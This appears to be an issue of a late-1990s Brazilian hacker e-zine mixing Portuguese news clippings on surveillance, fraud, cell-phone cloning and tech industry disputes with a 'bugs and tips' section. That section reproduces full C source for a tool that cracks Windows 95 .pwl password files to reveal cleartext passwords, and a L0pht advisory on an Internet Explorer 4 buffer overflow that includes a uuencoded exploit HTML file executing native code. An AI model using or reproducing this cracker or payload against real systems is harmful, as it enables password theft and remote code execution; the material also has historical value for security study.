NEWS  -  DICAS - BOATOS - HUMOR - NOVOS BUGS - CARTAS - SEI LÁ ..

RECEITA TESTA SISTEMA CONTRA SONEGAÇÃO

Objetivo é cruzar informações cadastrais de empresas com declarações de IR de pessoa jurídica

BRASÍLIA - A Secretaria da Receita Federal está montando um sistema integrado para reduzir, ainda mais, as possibilidades de sonegação de impostos federais por parte das empresas. Um projeto piloto já está em execução no Rio, com o objetivo específico de cruzar as informações de cadastro das empresas com as declarações de Imposto de Rednda da Pessoa Jurídica (IRPJ) e co os dados que fornecem por meio de outro documento, denominado Declaração de Contribuições e Tributos Federais (DCTF). Nesse documento a Pessoa Jurídica informa tudo o que pagou de imposto e relaciona eventuais créditos tributários que tem a receber.

Trata-se de uma inovação da Receita para eliminar as brechas que ainda permitem aos proprietários de empresas sonegar imposto como Pessoa Jurídica ou até na condição de Pessoa Física, quando apresentam suas declarações individuais. Montar interligação dos sistemas foi tarefa fácil, pois a Receita opera com 400 programas.

Hoje, esses programas não se comunicam e, para verificar ou cruzar informações, é preciso uma análise específica pelo Serpro. A Receita espera que até o fim de 1998 todos os programas estejam interligados.[...] (Estado de São Paulo, 15/08/97 - Beatriz Abreu e Lu Aiko Otta - seção de Economia)

Espiões Vermelhos

Como a polícia secreta de [..] espionava a oposição, sindicatos e até o PT.

[..] O governador [..] também gosta de se alimentar de informações produzidas na velha arapongagem policial. VEJA teve acesso a 123 relatórios feitos por uma equipe de quarenta policiais militares que formam o braço secreto da PM de Brasília, a PM-2. Nos documentos, constata-se que a polícia secreta do governador se encarrega de espionar reuniões de sindicatos petistas e até encontros de cúpula do próprio PT.

Como é regra nesse serviço, o trabalho dos agentes que se infiltravam em reuniões partidárias era condensado na forma de relatórios. Uma cópia deles ia para o Centro de Informações do Exército, o CIE. Outra era enviada para a Agência Brasileira de Inteligência, Abin, que sucedeu ao SNI. Uma terceira era despachada para o gabinete militar do governador. Lendo-se os relatórios, constata-se que os agentes secretos invadiam propriedade privada e operavam fora das divisas do Distrito Federal. Um dos relatórios, de abril do ano passado, mostra que agentes chegaram a bisbilhotar uma fazenda do deputado distrital e empresário Luiz Estevão, o amigo de Collor e líder da oposição ao governador. [..] A PM-2 formou uma estrutura com 140 pessoas, divididas entre as que saem à rua para trabalhar e aquelas que ficam no escritório batendo papo, o chamado "apoio". Não usavam farda nem iam ao quartel. Não andavam em viaturas, usavam nomes falsos e agiam como personagens de um filme B de espionagem. Também usavam equipamento de filmagem, gravação e armamento. Dentro do Palácio do Buriti há uma sala de cerca de 30 metros quadrados onde fica um computador que armazena parte dos relatórios. A sala, chamada oficialmente de Seção de Apoio Técnico da Casa Militar, fica a menos de cinquenta passos do gabinete do governador. O pedaço mais curioso, batizado de subseção de operações, fica num pequeno prédio, quase oculto, na Esplanada dos Ministérios, próximo ao Ministério da Fazenda. É um lugar cercado de mato alto, onde se revezam trinta agentes. É nesse bunker que os arapongas faziam seus relatórios. [..] Em todos os Estados, a PM tem um braço secreto e não é incomum que extrapole suas funções, entrando no terreno da espionagem e pura bisbilhotice. [..] Quando um governador toma posse não precisa mandar a Secretaria da Fazenda recolher tributos. Isso é uma tarefa automática. No caso do braço secreto da PM acontece o mesmo. A bisbilhotagem segue em que alguém dê uma ordem. O governador pode proibir a atividade, estimula-la ou deixar tudo como está, como quem não sabe de nada.[...]

(VEJA - 25/09/96 - pags 38,39,40 - Policarpo Jr., Brasília)

OLHAR ELETRÔNICO QUE VIGIA SP

Câmeras do CET registram tudo o que se passa em 86 cruzamentos e quatro túneis da cidade.

Sentir-se observado, procurar por toda parte e não encontrar ninguém pode não ser mania de perseguição. Você está mesmo sob olhares atentos, apesar de nem desconfiar disso. Mas o poderoso instrumento da "espionagem", que não perde um detalhe em seu campo de visão de 360 graus e dá zooms inacreditáveis é simples de ser localizado. Basta voltar a cabeça para cima num dos 86 cruzamento ou 4 túneis. Lá estão as câmeras da Companhia de Engenharia de Tráfego (CET).

Nesse momento, técnicos de controle de tráfego (TCT) podem estar captando o movimento on line num dos monitores das centrais espalhadas por São Paulo. Pelas telas das salas sempre na penumbra, esses profissionais têm uma pequena amostra de tudo o que acontece nas ruas da cidade. Imagens sem sons, mas impressionantes. Vão do acidente digno de filme de ação a relações sexuais praticadas por casais dentro de carros parados nos túneis.

Flagrar cenas tão constrangedoras como motoristas da terceira idade estapeando-se após uma batida, é quase um "acidente". [..] "O objetivo é a informação visual do tráfego, fazê-lo fluir", diz o coordenador do Projeto Semáforos Inteligentes da CET, Edgar Linguitte.[..]

Assim que qualquer ocorrência é registrada pela câmera, os técnicos põem o vídeo para funcionar. "Da gravação, podemos tirar estratégias para corrigir os problemas", diz Pulz. [..] Quando aciona o zoom de alguma câmera para socorrer alguém, por um momento o TCT Márcio Donizete tem a sensação de estar invadindo a privacidade das pessoas. "A gente vai no rosto do motorista, vê seus traços", admite Lima, que trabalha na Central da Bela Cintra, "Se há um acidente com duas pessoas, é como se você fosse a terceira, tamanha a realidade das imagens".[..]

Os casais paulistanos, por sua vez, têm escolhido os túneis para namorar. Dentro dos carros, parados nas baias planejadas para emergências, sentem-se protegidos dos curioso e mantêm relações sexuais sem o menor constrangimento.[..] Talvez a situação só seja complicada para o marronzinho que precisa ir ao local e convidar os animados namorados a retomar a viagem.[..] A urbanista Arlete Moyses Rodrigues, livre-docente da Universidade Estadual de Campinas (Unicamp) considera o sistema uma invasão da privacidade. "Esse tipo de fiscalização não acrescenta nada, o que deveria haver era investimento em educação".

(Jornal O Estado de São Paulo, 24/08/97, pags C1 - C4 - Marisa Folgato)


E D U P A G E

26 de agosto de 1997  |  Portugues

________________________________________________________________________

FRAUDES ON-LINE ENVOLVENDO CARTAO DE CREDITO

Devido ao grande numero de assinantes que inclui muitos iniciantes nas 
atividades on-line, a AOL (America Online) vem sendo um alvo facil para 
criminosos que tentam cometer fraude; os assinantes da AOL vem recebendo
mensagens que objetivam descobrir numeros de cartao de credito.  Em 
recente mensagem intitulada "Informacoes Importantes da AOL" e falsamente
identificada como vinda do Departamento de Assinaturas da AOL, os 
destinatarios das mensagens foram convidados a entrar na pagina da AOL na
Web e fornecer seus nomes e numero de cartao de credito.

Washington Post 26 ago 97


________________________________________________________________________

JUIZA DECIDE QUE CONTROLES DE EXPORTACAO DE CRIPTOGRAFIA VIOLAM 
LIBERDADE DE EXPRESSAO

Uma juiza de um Tribunal Distrital dos EUA decidiu que as restricoes, 
recentemente revisadas pelo Governo Clinton, sobre exportacao de 
software de criptografia, sao inconstitucionais.  Em dezembro, ela 
determinou que uma versao submetida era inconstitucional.  A decisao da 
juiza foi baseada em sua crenca de que codigos de computadores sao 
formas de expressao, "como musica e equacoes matematicas", e 
restringi-las constitui uma violacao da liberdade de expressao.  Alem 
disso, a nova regulamentacao, assim com as antigas, nao estabelece 
prazos ou padroes para as decisoes sobre licencas concedidas pelo 
governo e nao preve a revisao judicial.  A decisao "tera' um forte 
impacto na lideranca dos EUA na industria de software e do comercio 
eletronico", comentou um representante da Electronic Frontier 
Foundation", e um impacto enorme na questao do direito 'a privacidade 
nos proximos 100 anos".

AP 26 ago 97



______________________________________________________________________

CRACKER SE DECLARA CULPADO POR ROUBO DE INFORMACOES DE CARTAO DE CREDITO

Um cracker de computador, acusado de roubar mais de 100.000 numeros de 
cartao de credito de empresas que vendem produtos pela Internet, 
declarou-se culpado antes da data do julgamento e podera' pegar 30 anos 
de prisao e multas de ate' US$ 1 milhao.  A sentenca esta' prevista para 
ser proferida em 25 de novembro desse ano.

AP 26 ago 97


________________________________________________________________________


17 de agosto de 1997  |  Portugues
________________________________________________________________________

PROBLEMAS DE SEGURANCA

Dois dias apos a Experian Inc. (bureau de credito conhecido no passado 
como TRW Information Systems & Services) ter comecado a permitir que os 
clientes utilizassem a Internet para consultar seus relatorios pessoais 
de credito, a empresa repentinamente interrompeu a prestacao do servico 
apos ter tomado conhecimento de que quatro pessoas obtiveram informacoes 
financeiras sobre terceiros.  A professora de computacao da Universidade 
de Georgetown, Dorothy Denning, declarou que a experiencia da Experian 
"mostra como e' dificil a seguranca on-line no caso de prestacao de
servicos de acesso a informacoes".

Washington Post 16 ago 97


________________________________________________________________________

INDIVIDUO DELATADO POR PROVEDORA DE ACESSO E' PRESO POR PORNOGRAFIA

Uma provedora de servico Internet nao identificada, que auditava a conta 
de um individuo do Colorado "por razoes de negocios", alertou a policia 
de que tal individuo havia baixado mais de 70 fotos coloridas de adultos 
praticando sexo com criancas.  Estar em posse de material sobre 
pornografia infantil e' ma' conduta, e produzir e distribuir tal
material e' crime; o individuo foi preso.  Dave Banisar, do Centro de 
Informacoes Eletronicas de Privacidade levantou a questao da 
privacidade.  "As provedoras de servico nao devem fazer esse tipo de 
coisa.  Elas sao como as companhias telefonicas, que nao tem acesso 'as 
conversas telefonicas.  

AP 16 ago 97

________________________________________________________________________

HORA DE SE DESCONECTAR! AGORA! ENQUANTO E' TEMPO! SERIO MESMO!

A psicologa da Universidade de Pittsburgh, Kimberly S. Young, 
acha que as "salas de bate-papo" do ciberespaco e os jogos de fantasia 
constituem as principais atracoes para as pessoas propensas a se 
"viciarem" na Internet.  "Como nos bares de encontros, onde todos acabam 
conhecendo seus nomes".  Young comentou que vem sendo contatada por 
advogados a respeito de divorcios causados pelo vicio de um dos conjuges 
na Rede.

AP 15 ago 97

E D U P A G E

2 de outubro de 1997 | Portugues

________________________________________________________________________

"GERENTE DE CONHECIMENTOS": O MAIS NOVO ALIADO DA TECNOLOGIA

O novo cargo que esta' crescendo nos circulos da tecnologia da informacao e' o de "Gerente de Conhecimentos". A descricao do cargo se concentra em trazer negocios em potencial e conhecimentos tecnicos para melhorar a posicao da empresa na concorrencia e envolve nao apenas localizar como tambem organizar, manipular, filtrar e apresentar informacoes de forma que os empregados na linha de frente possam compreende-las e utiliza-las. Hal Varian, decano da Faculdade de Administracao de Informacao e Sistemas da Universidade de Berkeley, na California, comentou que existe uma grande quantidade de informacoes com que conta uma empresa e e' necessario estruturar tais recursos para que sejam uteis". Fornecer essa estrutura e trabalhar com o lado tecnico da empresa para tornar os recursos de informacao disponiveis e uteis aos empregados sera', cada vez mais, um elemento chave para a maioria das empresas nos proximos anos.

Information Week 29 set 97

________________________________________________________________________

SINDROME DA FADIGA POR EXCESSO DE INFORMACAO - PERIGOSO PARA A SAUDE

O fenomeno de contrair enfermidades como resultado do estresse causado por uma sobrecarga de informacoes tem agora um nome oficial - Sindrome da fadiga por excesso de informacao - e, de acordo com um relatorio do Reuters Business Information de 1996, quase metade dos gerentes de primeira linha e um terco de todos os gerentes sofrem dessa sindrome.

Investor's Business Daily 1 out 97

E D U P A G E

9 de novembro de 1997 | Portugues

O ESTADO DO TEXAS DOS EUA PROCESSA MICROSOFT

O estado do Texas - onde fica a matriz da Compaq e da Dell, duas das maiores fabricantes de computadores do mundo, esta' processando a Microsoft por interferir na investigacao do estado de possivel infracao da lei anti-monopolista da Microsoft, e os representantes do estado estao furiosos com a Microsoft por esta nao liberar os fabricantes das clausulas de "sigilo" contidas nos contratos de licenca. O procurador do geral do estado comentou: "O dominio exagerado de mercado exercido pela Microsoft intimida os fabricantes de computadores, cuja sobrevivencia depende essencialmente do acesso ao software de sistema operacional da Microsoft, que roda em 90% de todos os computadores pessoais vendidos hoje em dia. Os fabricantes estao com medo de passar informacoes porque nao ha' como eles as passarem confidencialmente". A Microsoft responde: "Permanecemos dispostos a discutir quaisquer conciliacoes que acomodem adequadamente os interesses da Microsoft em relacao 'a divulgacao de informacoes potenciais de sua propriedade... O codigo e os termos sob os quais se licencia esse codigo a outros constituem ativos criticos de qualquer empresa que esteja no ramo de software. Assim sendo, e' muito importante que se assegure a protecao adequada a esses ativos".

New York Times 8 nov 97

________________________________________________________________________

E D U P A G E
9 de novembro de 1997 | Portugues
O ESTADO DO TEXAS DOS EUA PROCESSA MICROSOFT
O estado do Texas - onde fica a matriz da Compaq e da Dell, duas das maiores
fabricantes de computadores do mundo, esta' processando a Microsoft por
interferir na investigacao do estado de possivel infracao da lei anti-monopolista
da Microsoft, e os representantes do estado estao furiosos com a Microsoft
por esta nao liberar os fabricantes das clausulas de "sigilo" contidas nos
contratos de licenca. O procurador do geral do estado comentou: "O dominio
exagerado de mercado exercido pela Microsoft intimida os fabricantes de
computadores, cuja sobrevivencia depende essencialmente do acesso ao software
de sistema operacional da Microsoft, que roda em 90% de todos os computadores
pessoais vendidos hoje em dia. Os fabricantes estao com medo de passar
informacoes porque nao ha' como eles as passarem confidencialmente". A Microsoft
responde: "Permanecemos dispostos a discutir quaisquer conciliacoes que acomodem
adequadamente os interesses da Microsoft em relacao 'a divulgacao de informacoes
potenciais de sua propriedade... O codigo e os termos sob os quais se licencia
esse codigo a outros constituem ativos criticos de qualquer empresa que esteja
no ramo de software. Assim sendo, e' muito importante que se assegure a protecao
adequada a esses ativos".
New York Times 8 nov 97
________________________________________________________________________


E D U P A G E

6 de novembro de 1997  |  Portugues
________________________________________________________________________

LEGISLACAO PARA ROUBO CIBERNETICO COLOCARIA ATE' ROBIN HOOD NA CADEIA

De acordo com um projeto de lei introduzido pela Camara de Deputados 
dos EUA pelo congressista Bob Goodlatte (republicado pelo estado da 
Virginia), qualquer pessoa que utilize a Rede para se apropriar 
indevidamente de trabalhos patenteados estara' cometendo uma infracao 
federal, seja qual for o objetivo do ato - lucro pessoal ou nao.  A 
inspiracao para essa legislacao veio de um julgamento de um caso em 
Massachusetts em que um estudante deixou 'a disposicao do publico, em 
um boletim eletronico, um software comercial.

AP 6 nov 97
________________________________________________________________________

MCNEALY CONTRA GATES

O executivo da Sun, Scott McNealy, fez um apelo aos apoiadores da 
linguagem Java para que enviassem uma "enxurrada" de mensagens 
eletronicas para Bill Gates registrando que "queremos 100% Java".  Ele 
comentou:  "A Microsoft nao e' mais distribuidora de plataformas Java.  
As pessoas estao confusas, com a impressao que existem duas versoes da 
Java.  Isso nao e' verdade, so' existe uma: Java pura ...  Ao se pingar 
tres gotas de veneno em uma aplicacao 100% Java,  obtem-se ... Windows.  
Ao se pingar tres gotas de Java em Windows, ainda obtem-se Windows."  
Tod Nielsen, executivo da Microsoft, respondeu 'as acusacoes de 
McNealy assim:  "A diretoria da Sun deveria lavar a boca com sabao.  
Se minha filha de cinco anos falasse dessa forma ela estaria soltando 
bolhas de sabao pela boca".

New York Times Cybertimes 6 nov 97


________________________________________________________________________

O CASAL DA INTERNET

São Paulo, segunda, 20 de outubro de 1997.

-----------------------

NAMORO VIRTUAL

Eles estavam em um hotel

Casal da Internet é achado vivo no PI

e do NP

Policiais de Teresina (PI) prenderam anteontem, às 7h, o goiano Oliveira e Silva, que há 12 dias havia sumido com a artista Carla Patrícia Coelho, que mora em Campo Grande (MS).

[..]

Silva e Carla foram encontrados na ???????? ??????? Hotel, na BR-316. Ele foi preso em flagrante e autuado por de automóvel. "Ele furtou um carro em Fortaleza para fugir a artista plástica", disse o delegado.

[..]

"Caí num abismo. Não sei se conseguirei acreditar nas pessoas",afirmou Carla.

------------------------

São Paulo, terça, 21 de outubro de 1997.

Plano de internautas era se casar ntem

(PAULO MOTA da Agência Folha, em Fortaleza RUBENS VALENTE da Agência Folha, em Campo Grande)

O desempregado Flávio de Oliveira e Silva, 36, e a artista plástica Carla Patrícia Coelho, 29, que se conheceram pela Internet e passaram 13 dias desaparecidos, tinham planejado se casar ontem, numa "grande festa à moda cigana", em Campo Grande(MS). "Ele (Silva) disse que iria aproveitar o aniversário dele hoje (ontem) e fazer uma festa só", afirmou Carla.

Os dois foram encontrados pela polícia anteontem num hotel, em Teresina (PI). Eles estavam sem dar notícias a parentes desde 8 de outubro, quando saíram de um hotel luxuoso em Fortaleza (CE) sem pagar a conta de R$ 1.700. Silva foi preso em flagrante, acusado de estelionato e não quis falar com a Agência Folha. A polícia acredita que Carla foi enganada por Silva e considerou-a inocente.

[..]

O casal se encontrou em 2 de outubro, em Goiânia, e embarcou para Fortaleza, para uma "viagem de lua-de-mel". A hospedagem foi numa suíte com vista para o mar e diária de R$ 273. Usando um carro alugado em Fortaleza, o casal acumulou dívida de R$ 4.800 em despesas e hospedagens em hotéis de praias como Jericoacoara (CE), Parnaíba (PI) e São Luiz (MA). As contas foram pagas com cheques e cartões de Carla, que confiava num depósito de R$ 10 mil que Silva havia feito em sua conta. O cheque depositado era roubado de outra conta da própria Carla.

Ela diz que só descobriu que Silva estava mentindo quando a polícia os abordou em Teresina.

FOLHA DE São Paulo, domingo, 13 de julho de 1997.

EMPREGADO LADRÃO

perfil do funcionário desonesto aplica mais golpes no trabalho

PIVETTA

Reportagem Local

Pesquisa feita pelo especialista em fraudes e crimes financeiros

Marcelo Alcides Gomes, 33, traçou o perfil do empregado que rouba ou dá golpes na empresa em que trabalha. De acordo com dados preliminares da pesquisa, o golpista típico é o homem casado, com idade entre 31 e 40 anos, que ocupa um cargo abaixo do nível de gerência e terminou apenas o segundo grau.

As mulheres aparecem na pesquisa como sendo autoras de apenas 16,7% dos delitos cometidos nas empresas. Primeiro brasileiro a ser aceito como membro da Association of Certified Fraud Examiners (associação de investigadores de fraudes em empresas) -que reúne 13 mil associados e é sediada nos EUA-, Gomes enviou questionários a 1.500 empresas brasileiras (inclusive as 500 maiores) e recebeu, até agora, resposta de 735 companhias.

A pesquisa constatou algum tipo de golpe ou desfalque cometido por funcionários em 717 (97,5%) das 735 empresas. "Apesar de a maioria dos crimes serem cometidos por empregados com nível inferior ao de gerente e sem curso superior, os maiores desfalques, em termos financeiros, tendem a ser feitos por profissionais com cargo de gerência ou diretoria e curso superior completo", afirmou Gomes.


revista VEJA 08-10-97                    Daniel Nunes Gonçalves

A estudante paulista Alessandra Massis comprou um telefone celular há sete meses. Ela utiliza o aparelho com comedimento e raramente faz ligações interurbanas. Chamada internacional, nem pensar. Sua conta é a tradução de seus hábitos: 60 reais, no máximo. A fatura de março, portanto, só podia deixá-la de cabelo em pé: 13.571 reais. "Quase morri de susto", diz a estudante. A conta acusava 1.032 ligações para 36 países, do Kuwait à Colômbia, passando pela Suíça e Afeganistão. Alessandra procurou a empresa telefônica do Estado de São Paulo, Telesp, e convenceu os funcionários a dispensá-la do pagamento.[..] . A cada trinta minutos, a companhia recebe a visita de um dono de celular apavorado com contas astronômicas, fruto de ligações que dizem não ter feito, todos vítimas de uma fraude que só faz crescer clonagem. Os clones são telefones não registrados, programados para debitar suas chamadas na conta de pessoas desavisadas, como Alessandra.

[..]

Desde o início do ano foram registrados milhares de casos de clonagem. Fala-se num prejuízo estimado em 60 milhões de reais para as teles, que poupam os clientes do pagamento mas têm de pagar à Embratel e às telefônicas internacionais pelas chamadas efetuadas.

[..]

Para programar um celular frio para debitar suas chamadas na conta de um celular quente é preciso ser técnico em eletrônica e comprar um equipamento de rádio portátil   chamado scanner, que custa 400 reais e registra a   freqüência em que operam os celulares à sua volta.

[..]

Para dar alguma segurança ao usuário, a Embratel contratou uma firma americana, a Digital, que vai instalar um sistema antifraude orçado em 14 milhões de reais. O sistema, empregado na França e na Itália, compara cada nova ligação feita com o histórico de chamadas da pessoa. "Se alguém só faz ligações nacionais e surge uma chamada internacional de uma hora, o computador dispara um alarme. Aí, entramos em contato com o usuário para checar a autoria do telefonema", informa José Carlos Gabarra, da Digital. O novo sistema deve estar operando até março do ano que vem


BUGS e DICAS

------- start of forwarded message (RFC 934 encapsulation) -------

From: Frank Andrew Stevenson <frank@funcom.no>

To: cypherpunks@toad.com

Subject: Cracked: WINDOWS.PWL

Date: Mon, 4 Dec 1995 17:51:36 +0100 (MET)

A few days ago Peter Gutmann posted a description on how Windows 95 produces RC4 keys of 32 bits size to protect the .pwl files. I verified the information and wrote a program to decrypt .pwl files with a known password, I then discovered that the .pwl files where well suited for a known plaintext attack as the 20 first bytes are completely predictable.

The 20 first bytes of any .pwl files contains the username, which

is the same as the filename, in capitals, padded with 0x00. From then I wrote a program to bruteforce the .pwl file and optimized it so it would run in less than 24 hours on an SGI. I run a test of the bruter software and recovered an unknown rc4 key in 8 hours, but the decrypted file was still largely uninteligeble, I then proceeded to decrypt the file at all possible starting points, and discovered valuable information (cleartext passwords) offset in the file.

This has enormous implications: RC4 is a stream cipher, it generates a long pseudo random stream that it uses to XOR the data byte by byte. This isn't neccecaraly weak encryption if you don't use the same stream twice: however WIN95 does, every resource is XORed with the same pseudo random stream. What's more the 20 first bytes are easy to guess. This is easy to exploit: XOR the 20 bytes starting at position 0x208 with the user name in uppercase, and slide this string through the rest of the file (xoring it with whatever is there) this reveals the 20 first bytes of the different resources.

>From there I went on to study the structure of the .pwl file it is

something like this (decrypted):

USERNAME.........wpwpwpwpwpwpwpwpwpwp

rs???????

rs

rs

rs???????????

rs???????

where wp is i word pointer to the different resources (from start of pwl file) The 2 first bytes of the resource (rs) is its length in bytes (of course XOR with RC4 output) It is the fairly easy to find all the resource pointers by jumping from start of resource to next resource, had it not been for the fact that the size sometimes is incorrect (courtesy of M$)

What follows is a short c program that tries to remedy this and reconstruct the pointertable thus generating at least 54 bytes of the RC4 pseudorandom stream, and then proceedes to decrypt as much as possible from the different resources. What does this show? Although RC4 is a fairly strong cipher, it has the

same limitations as any XOR streamcipher, and implementing it without sufficient knowledge can have dire consequences. I strongly suggest that the programmers at Microsoft do their homework before trying anything like this again!

DISCLAIMER:

This is a quick hack, I don't make any claims about usefulness for any purpose, nor do I take responsibility for use nor consequences of use of the software. FUNCOM of Norway is not responsible for any of this, (I speak for myself, and let others speak for themselves) This source is hereby placed in the public domain, please improve if you can.

- --- glide.c ---

#include <stdio.h>

#include <string.h>

unsigned char Data[100001];

unsigned char keystream[1001];

int Rpoint[300];

main (int argc,char *argv[]) {

FILE *fd;

int i,j,k;

int size;

char ch;

char *name;

int cracked;

int sizemask;

int maxr;

int rsz;

int pos;

int Rall[300]; /* resource allocation table */

if (argc<2) {

printf("usage: glide filename (username)");

exit(1);

}

/* read PWL file */

fd=fopen(argv[1],"rb");

if(fd==NULL) {

printf("can't open file %s",argv[2]);

exit(1);

}

size=0;

while(!feof(fd)) {

Data[size++]=fgetc(fd);

}

size--;

fclose(fd);

/* find username */

name=argv[1];

if(argc>2) name=argv[2];

printf("Username: %s\n",name);

/* copy encrypted text into keystream */

cracked=size-0x0208;

if(cracked<0) cracked=0;

if(cracked>1000) cracked=1000;

memcpy(keystream,Data+0x208,cracked );

/* generate 20 bytes of keystream */

for(i=0;i<20;i++) {

ch=toupper(name[i]);

if(ch==0) break;

if(ch=='.') break;

keystream[i]^=ch;

};

cracked=20;

/* find allocated resources */

sizemask=keystream[0]+(keystream[1]<<8);

printf("Sizemask: %04X\n",sizemask);

for(i=0;i<256;i++) Rall[i]=0;

maxr=0;

for(i=0x108;i<0x208;i++) {

if(Data[i]!=0xff) {

Rall[Data[i]]++;

if (Data[i]>maxr) maxr=Data[i];

}

}

maxr=(((maxr/16)+1)*16); /* resource pointer table size

appears to be

divisible by 16 */

/* search after resources */

Rpoint[0]=0x0208+2*maxr+20+2; /* first resource */

for(i=0;i<maxr;i++) {

/* find size of current resource */

pos=Rpoint[i];

rsz=Data[pos]+(Data[pos+1]<<8);

rsz^=sizemask;

printf("Analyzing block with size:

%04x\t(%d:%d)\n",rsz,i,Rall[i]);

if( (Rall[i]==0) && (rsz!=0) ) {

printf("unused resource has nonzero size !!!\n");

exit(0);

}

pos+=rsz;

/* Resources have a tendency to have the wrong size for

some reason */

/* check for correct size */

if(i<maxr-1) {

while(Data[pos+3]!=keystream[1]) {

printf(":(%02x)",Data[pos+3]);

pos+=2; /* very rude may fail */

}

}

pos+=2; /* include pointer in size */

Rpoint[i+1]=pos;

}

Rpoint[maxr]=size;

/* insert Table data into keystream */

for(i=0;i <= maxr;i++) {

keystream[20+2*i]^=Rpoint[i] & 0x00ff;

keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;

}

cracked+=maxr*2+2;

printf("%d bytes of keystream recovered\n",cracked);

/* decrypt resources */

for(i=0;i < maxr;i++) {

rsz=Rpoint[i+1]-Rpoint[i];

if (rsz>cracked) rsz=cracked;

printf("Resource[%d] (%d)\n",i,rsz);

for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);

printf("\n");

}

exit(0);

}

- --- end ---

#include <std/disclaimer.h>

E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for key

* * * * * * * * * * * * * * * * * * * *

_______________________________________________________________

       Document: L0pht Security Advisory

    URL Origin:  http://l0pht.com/advisories.html
  Release Date:  November 1st, 1997
   Application:  Microsoft Internet Explorer 4.0 Suite
      Severity:  Viewing remote HTML content can execute arbitrary native code
        Author:  dildog@l0pht.com
 Operating Sys:  Windows 95

-------------------------------------------------------------------------------

 ========
 Scenario
 ========

  The Microsoft Internet Explorer 4.0 Suite, including all programs supplied
  with it that read and/or process HTML from either local machines, intranet
  machines, or remote internet machines are subject to a buffer overflow in the
  HTML decoding process. The buffer overflow can cause the application to page
  fault, or in the worst case, execute arbitrary precompiled native code.

 =======
 Example
 =======

  1. Copy the supplied HTML file(s) into a location that is accessible via the
     target application.
  2. Point to it. Look at it.
  3. Click on the link. (or let someone click it for you)
  4. Become aware of what happens to your machine.
  5. Freak out and beg Microsoft to make the bad man stop.

 =================
 Technical Details
 =================

  The problem here lies in the deciphering of the URL line format itself. The
  base HTML library that is used by the Internet Explorer 4.0 Suite and the
  following programs are vulnerable:

        - Outlook Express (both mail and news)
        - Windows Explorer
        - Internet Explorer (different than regular explorer, really)

  This problem, because it stems from a programming flaw in the HTML decoding
  system, is unaffected by the Explorer "Security Zones" feature. In other
  words, if you turn on the highest security level for the zone from where the
  exploit HTML is being viewed, you are still vulnerable.

  The critical problem here is a buffer overflow in the parsing of a particular
  new type of URL protocol. The "res://" type of URL is meant to allow access
  to a local resource embedded in a local DLL file. This is useful for
  archiving entire websites into a DLL and is not, in its truest concept, a
  security flaw.

  For example, to read something out of the IE4.0 Tour (stored in a DLL) try
  the following URL: res://ie4tour.dll/page1-6.htm

  The buffer overflow is on the actual filename specified. To crash your
  machine go ahead and try res://blahblahblah ... blahblah/ in your Internet
  Explorer window where the amount of 'blah' equals 265 characters.

  The function that goes through the filename and validates it is flawed on
  Windows 95. Without checking the length, the filename is uppercased,
  concatenated with '.DLL' if it isn't there already, and in the process,
  copied into a fixed size buffer.

 ========
 Solution
 ========

  Currently, there is no solution available for this flaw. You can't set any
  Internet Explorer options to avoid it, and you are not protected by any
  level of zone security. Simply don't surf the web, read email or view
  net news using Internet Explorer 4.0 until Microsoft puts up a hotfix.

 ============
 Exploit Code
 ============


    Here we go...
    When constructing the exploit we want to try something useful.
    Lets's start with appending text of your choice to AUTOEXEC.BAT...
    (note that running native code lets you do pretty much anything you want)

    Note that the location of the exploit string in the stack is very important
    and it varies from target application to target application.

    Constructing the exploit string:
    Figure out stack location for exploit code...

        App                     Loc
        Internet Explorer       0x0057C144
        Windows Explorer        0x0088A0F4
        ...

    Yeah, I know that those locations have null bytes in them and you can't
    put those (or lowercase letters, or CR/LF or 0x07 or anything like that)
    in the exploit string... but we'll let microsoft fix that for us. Step thru
    the process to see IE add that extra null character for you. Will they
    ever cease to amaze...

    Put together what you wanna do, tack on the necessary jump addresses and
    all that. That's it.


And now, UUENCODED to preserve freshness:

*************************************************************************
* MAKE SURE YOU RUN THIS EXPLOIT WITH __INTERNET__ EXPLORER, _NOT_      *
* REGULAR OL' WINDOWS EXPLORER. (put it on a website and download it or *
* click on the IE desktop icon (run iexplore.exe) and type in the name  *
* of the file into the URL line)  IT WON'T WORK OTHERWISE!!!!           *
*                                (though it could be made to do so)     *
*************************************************************************

----====/ SNIP

section 1 of uuencode 5.20 of file infect.htm    by R.E.M.

begin 644 infect.htm
M/&AT;6P^#0H\:&5A9#X-"CQT:71L93X-"DEN=&5R;F5T($5X<&QO:71E<@T*
M/"]T:71L93X-"CPO:&5A9#X-"CQB;V1Y(&)G8V]L;W(](T9&1D9&1B!T97AT
M/2,P,#`P,#`^#0H-"CQC96YT97(^#0H\:#$^5VAA="!D;R!)('=A;G0@=&\@
M:6YF96-T('1O9&%Y/SPO:#$^#0H-"D-L:6-K(&AE<F4@=&\@;6]D:69Y(&%U
M=&]E>&5C+F)A=#QP/@T*#0H\82!H<F5F/2(-"G)E<SHO+[C$0=B`+8"`@("0
MD)"0D)"+V#/)@,&J`]FQ7XH3@.)_B!-#XO:0D)"0D%"0D&H"D)"0NNW"6`&!
MZ@$!`0&04KNW\O>_@.^`_]-:6E"0D#/;LP)3@^L$4U"[X(#YO__3@^P,D%A0
M,]NS.5.[#-+G$('K$!"0$%-0N[#*^;__TX/$#)"0D)"[SX#YO__3D)"0N["O
M^+__TY"0D,S,+2TM+2TM+2TM+2TM+4,Z7$%55$]%6$5#+D)!5("-BD5#2$\@
M34E#4D\D3T94(#!73EH@64]5+BXN(%)%4$5.5"!!3D0@0D4@4T%6140AC8I0
M055318V*@"TM+2TM+2TM+2TM+2TM+2U!04%!0D)"0D,!(+Z_1$1$143!5R\-
M"B(^#0H\9F]N="!F86-E/2)7:6YG9&EN9W,B('-I>F4]*S8^_SPO9F]N=#X\
M9F]N="!S:7IE/2LV/CT\+V9O;G0^/&9O;G0@9F%C93TB5VEN9V1I;F=S(B!S
M:7IE/2LV/B9G=#PO9F]N=#X-"CPO83X-"@T*/"]C96YT97(^#0H-"CPO8F]D
->3X-"CPO:'1M;#X-"CX-
`
end
sum -r/size 62455/917 section (from "begin" to "end")
sum -r/size 5779/643 entire input file

/====---- SNIP


A haiku:

 Microsoft IE
 Is there no security?
 Not if you ask me.

dildog@l0pht.com (11/1/97)

-------------------------------------------------------------------------------

For more L0pht (that's L - zero - P - H - T) advisories check out:
http://l0pht.com/advisories.html


ANTI-SPAM SOFTWARE

http://members.aol.com/macabrus/utilities.html

